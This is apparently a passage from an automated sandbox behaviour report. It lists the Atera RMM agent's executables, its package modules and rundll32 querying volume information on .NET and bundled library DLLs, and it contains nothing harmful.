Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIE7A0.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIE7A0.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIE7A0.tmp-\Newtonsoft.Json.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll VolumeInformation
